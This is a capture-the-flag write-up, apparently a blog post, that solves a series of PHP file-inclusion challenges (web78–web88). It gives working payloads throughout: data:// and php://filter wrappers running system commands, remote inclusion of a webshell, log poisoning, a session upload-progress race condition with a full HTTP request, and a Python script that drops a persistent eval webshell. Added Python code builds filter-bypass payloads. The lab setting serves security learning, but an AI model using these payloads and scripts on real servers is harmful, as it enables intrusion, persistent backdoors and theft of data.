CTFshow WEB beginner series: file inclusion (continuously updated)

web78

?file=data://text/plain,<?php system("cat flag.php");?>

Reading flag.php through a pseudo-protocol (php://filter) works as well.

web79

?file=data://text/plain,<?= system("cat flag*");?>

The short echo tag <?= keeps the literal string php out of the payload; alternatively, hide it in base64:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

Here data:// can also be written as data: since PHP accepts both spellings of the wrapper.

web80

Method 1: remote file inclusion

Put a one-line webshell in 1.txt on a VPS and include it over HTTP:

?file=http://118.***.***.***/1.txt

Method 2: log file inclusion

?file=/var/log/nginx/access.log

nginx writes the User-Agent header of every request into access.log, so put the webshell in the UA header of any request and then include the log. Log inclusion for both nginx and Apache is a standard test point: one request poisons the log, a second one includes it.

web81

Same approach as web80, except that the colon is filtered, so the remote include (http://...) is no longer possible; log file inclusion still works.

web82

A new technique for me, and a very interesting hole: session file inclusion through PHP_SESSION_UPLOAD_PROGRESS combined with a race condition. With session.upload_progress.enabled on (the default), a multipart POST that carries a PHP_SESSION_UPLOAD_PROGRESS field makes PHP store upload-progress data, including that field's value, in the session file sess_<PHPSESSID>, even though the target never calls session_start(); because session.upload_progress.cleanup is also on by default, the data is deleted as soon as the upload finishes, which is why the include has to race the upload.
Reference link:
Using session.upload_progress for file inclusion and deserialization attacks

Host this page locally, upload any file through it, and capture the request:


<?php session_start(); ?>  <!-- must run before any output, otherwise the headers are already sent -->
<!DOCTYPE html>
<html>
<body>
<!-- action is empty: the form posts back to the page serving it. Capture the
     request in Burp and retarget it at the challenge URL. -->
<form action="" method="POST" enctype="multipart/form-data">
    <!-- the value of this field is what PHP copies into the session file -->
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

Put the PHP to execute in the PHP_SESSION_UPLOAD_PROGRESS field, as in the captured request below.
Then loop the captured request with Burp Intruder (null payloads, unlimited); remember to set a PHPSESSID cookie of your own, since the server accepts whatever value you send.
In parallel, race it from the other side by repeatedly including the matching session file, /tmp/sess_<PHPSESSID>, through the ?file= parameter.
When an include lands while the progress data is still in the file, the payload runs and the flag comes back.

POST / HTTP/1.1
Host: 110205c4-0a4a-467e-82e9-ded805f240cc.chall.ctf.show
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://110205c4-0a4a-467e-82e9-ded805f240cc.chall.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Cookie: PHPSESSID=feng
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Length: 317

------WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php system("cat fl0g.php");?>
------WebKitFormBoundaryvGEmmKnnXVzQVMQB
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain

111
------WebKitFormBoundaryvGEmmKnnXVzQVMQB--

web83

Same technique, scripted this time:

import io
import sys
import threading

import requests

host = 'http://0df0bded-da5c-4bcc-92bd-e871bb1427a5.chall.ctf.show/'
sessid = 'vrhtvjd4j1sd88onr92fm9t2sj'  # arbitrary: the server accepts any PHPSESSID we choose

# Payload placed in PHP_SESSION_UPLOAD_PROGRESS. PHP copies it into the session
# file as part of the upload_progress_ key, so including that file executes it.
# It prints the flag, drops a persistent shell, and echoes md5('1') as a marker
# so the reader thread can recognise a successful race.
PAYLOAD = ("<?php system('cat *');"
           "fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');"
           "echo md5('1');?>")
MARKER = 'c4ca4238a0b923820dcc509a6f75849b'  # md5('1')


def POST(session):
    # Keep the session file populated: a 50 KB upload body widens the window
    # before session.upload_progress.cleanup removes the progress data.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            host,
            data={"PHP_SESSION_UPLOAD_PROGRESS": PAYLOAD},
            files={"file": ('a.txt', f)},
            cookies={'PHPSESSID': sessid},
        )


def READ(session):
    # Race the uploader: include the session file until the marker shows up.
    while True:
        response = session.get(f'{host}?file=/tmp/sess_{sessid}')
        if MARKER not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session,))
    t1.daemon = True
    t1.start()
    READ(session)

web84

Same as above

web85

Same as above

web86

Same as above

web87

Reference article:
Talk about the magical use of php://filter

file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2577%2572%2569%2574%2565%253d%2563%256f%256e%2576%2565%2572%2574%252e%2562%2561%2573%2565%2536%2534%252d%2564%2565%2563%256f%2564%2565%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%2531%252e%2570%2568%2570

content=aaPD9waHAgZXZhbCgkX1BPU1RbMF0pOz8%2B

The file parameter is double URL-encoded; decoded it is php://filter/write=convert.base64-decode/resource=1.php, so whatever is written to 1.php passes through a base64 decoder first. The content parameter, after the two leading a characters are removed, decodes to <?php eval($_POST[0]);?>. The two a characters are padding: the challenge prepends a <?php die(...);?> guard to the content it writes, the decode filter drops every character outside the base64 alphabet, and six characters of the guard survive ('phpdie'); two more characters bring that to a multiple of four, so the decoder is realigned before the real payload starts and the guard becomes six bytes of junk instead of a working die().
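To make the alignment argument concrete, here is an added example (mine, not the write-up's code) that models PHP's convert.base64-decode filter in Python, computes the filler needed for any guard text, and rebuilds both request parameters. The guard string is the one the web87 challenge prepends; everything else follows from it.

```python
# Added example (not the write-up's own code): a model of PHP's
# convert.base64-decode write filter, used to show why the content parameter
# starts with two filler characters and to reproduce both request parameters.
import base64
import re
from urllib.parse import quote

NON_B64 = re.compile(r"[^A-Za-z0-9+/]")

# Guard the challenge prepends to $content before the filtered write (taken
# from the web87 source). The decoder discards the non-alphabet characters,
# including the Chinese text, leaving only 'phpdie'.
GUARD = "<?php die('大佬别秀了');?>"


def php_base64_decode_filter(data: str) -> bytes:
    """Model of convert.base64-decode: characters outside the base64 alphabet
    are skipped, the rest is decoded in 4-character groups. Python's decoder
    insists on padding, so it is re-added here; PHP tolerates its absence."""
    kept = NON_B64.sub("", data)
    return base64.b64decode(kept + "=" * (-len(kept) % 4))


def filler_for(guard: str) -> str:
    """Filler that brings the guard's surviving characters to a multiple of 4,
    realigning the decoder before the real payload begins. Any alphabet
    character works; for the web87 guard six survive, hence two fillers."""
    survivors = len(NON_B64.sub("", guard))
    return "a" * (-survivors % 4)


def build_content(shell: bytes, guard: str = GUARD) -> str:
    """Raw value of the content parameter: filler + base64(shell)."""
    return filler_for(guard) + base64.b64encode(shell).decode()


def content_param(shell: bytes, guard: str = GUARD) -> str:
    """URL-encoded content parameter ('+' must become %2B, otherwise the web
    server turns it into a space and the base64 breaks)."""
    return quote(build_content(shell, guard), safe="")


def double_url_encode(s: str) -> str:
    """Encode every byte twice (%XX -> %25XX), as the write-up's file parameter
    does: the web server decodes once, the challenge's urldecode() once more."""
    return "".join("%%25%02x" % b for b in s.encode())


def written_file(content: str, guard: str = GUARD) -> bytes:
    """Bytes that land in resource=1.php once the filter has run over guard+content."""
    return php_base64_decode_filter(guard + content)


if __name__ == "__main__":
    shell = b"<?php eval($_POST[0]);?>"
    print("file    =", double_url_encode("php://filter/write=convert.base64-decode/resource=1.php"))
    print("content =", content_param(shell))
    print("1.php   =", written_file(build_content(shell)))
    print("without filler:", written_file(base64.b64encode(shell).decode()))
```

Running it reproduces the two parameters shown above exactly, and the last line shows what happens without the filler: the decoder starts the payload two characters early and the shell never appears in 1.php. filler_for generalises the trick to any prepended guard, since only the count of surviving base64 characters matters.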

web88

Learned the later tricks and forgot the earlier ones: I had forgotten that the data: wrapper can also be combined with base64 to get past a filter, which is embarrassing.
The filter blocks the literal string php (along with punctuation such as =) but not the data: wrapper itself, so hide the PHP in base64:

?file=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMF0pOw

The full base64 of <?php eval($_POST[0]); is PD9waHAgZXZhbCgkX1BPU1RbMF0pOw==, but = is filtered. The trailing = signs are only padding and PHP's decoder accepts the string without them, so they can simply be dropped.
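web79 and web88 are the same decision made twice: which spelling of the data: wrapper gets past the filter. The added example below (mine, not the write-up's code) enumerates the spellings PHP's include() accepts for a payload, with and without the redundant // and with and without the = padding, and reports which blocklist tokens each one would trip. The check runs on the decoded value, which is what the server filters; the blocklists in the test are taken from what the write-up says the challenges filter (php for web79, php and = for web88), and the match is case-insensitive, which is stricter than a plain str_replace.

```python
# Added example (not the write-up's code): generate the data: wrapper
# spellings for a payload and check each against a blocklist, so the
# base64 / no-padding / no-slashes choice is made by inspection instead of
# trial and error against the target.
import base64


def b64_no_padding(payload: bytes) -> str:
    """Base64 without the trailing '=' filler. PHP's decoder, the data: wrapper
    included, accepts unpadded input, so '=' never needs to reach a filter."""
    return base64.b64encode(payload).decode().rstrip("=")


def data_wrapper_candidates(payload: bytes):
    """Spellings of the data: wrapper that PHP accepts for `payload`, in the
    order a human would try them: plain text first, then base64, then base64
    with the optional '//' and '=' characters removed."""
    text = payload.decode()
    b64 = base64.b64encode(payload).decode()
    yield "data://text/plain," + text
    yield "data:text/plain," + text
    yield "data://text/plain;base64," + b64
    yield "data://text/plain;base64," + b64_no_padding(payload)
    yield "data:text/plain;base64," + b64_no_padding(payload)


def blocked_tokens(candidate: str, blocklist) -> list:
    """Tokens from `blocklist` present in `candidate`, matched case-insensitively
    like a preg_match with /i. An empty list means the candidate gets through."""
    low = candidate.lower()
    return [t for t in blocklist if t.lower() in low]


def first_passing(payload: bytes, blocklist):
    """First candidate that trips none of the blocklist, or None. The value
    returned is the decoded one the server filters and includes; URL-encode it
    (urllib.parse.quote(..., safe="")) before placing it in ?file=."""
    for cand in data_wrapper_candidates(payload):
        if not blocked_tokens(cand, blocklist):
            return cand
    return None


def php_tolerant_b64decode(s: str) -> bytes:
    """Re-add the padding and decode, which is what PHP does with the
    unpadded string; used to confirm a stripped payload still round-trips."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


if __name__ == "__main__":
    # Constructed blocklists, taken from what each challenge is said to filter.
    for name, payload, blocklist in (
        ("web78", b'<?php system("cat flag.php");?>', []),
        ("web79", b'<?php system("cat flag.php");?>', ["php"]),
        ("web79 short tag", b'<?= system("cat flag*");?>', ["php"]),
        ("web88", b"<?php eval($_POST[0]);", ["php", "="]),
    ):
        print(f"{name:16} {first_passing(payload, blocklist)}")
```

Base64 output may itself contain + or /, so when a filter blocks those too, blocked_tokens will report it; the fix in that case is to change the payload (an extra space or a different quoting style shifts the encoding) until a clean candidate appears.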

Source: blog.csdn.net/rfrder/article/details/112864247